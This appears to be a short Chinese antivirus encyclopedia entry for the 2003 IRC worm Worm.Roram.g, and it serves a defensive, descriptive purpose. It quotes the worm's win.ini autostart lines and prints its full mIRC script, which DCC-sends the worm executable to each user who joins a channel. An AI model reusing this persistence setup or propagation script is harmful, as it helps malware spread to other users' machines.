病毒名称:
Worm.Roram.g
类别: 蠕虫病毒
病毒资料:
破坏方法:
IRC蠕虫,运行后将自己复制到目录
C:\Windows文件名为:Poire.exe
修改系统文件win.ini的run项以使自己能随系统自启动,相关项如下:
[windows]
load=C:\Windows\Poire.exe
run=C:\Windows\Poire.exe
病毒同时建立一个IRC脚本来传染,脚本名为:script.ini
存放目录为IRC的目录:C:\Program files\mIRC
脚本内容为:
[script]
n0=on 1:join:*.*:
n1={ if ( $nick==$me) {halt}
n2=/dcc send $nick C:\Windows\Poire.exe
n3=}
病毒的清除法:
使用光华反病毒软件,彻底删除。
病毒演示:
病毒FAQ:
Windows下的PE病毒。
发现日期:
2003-6-9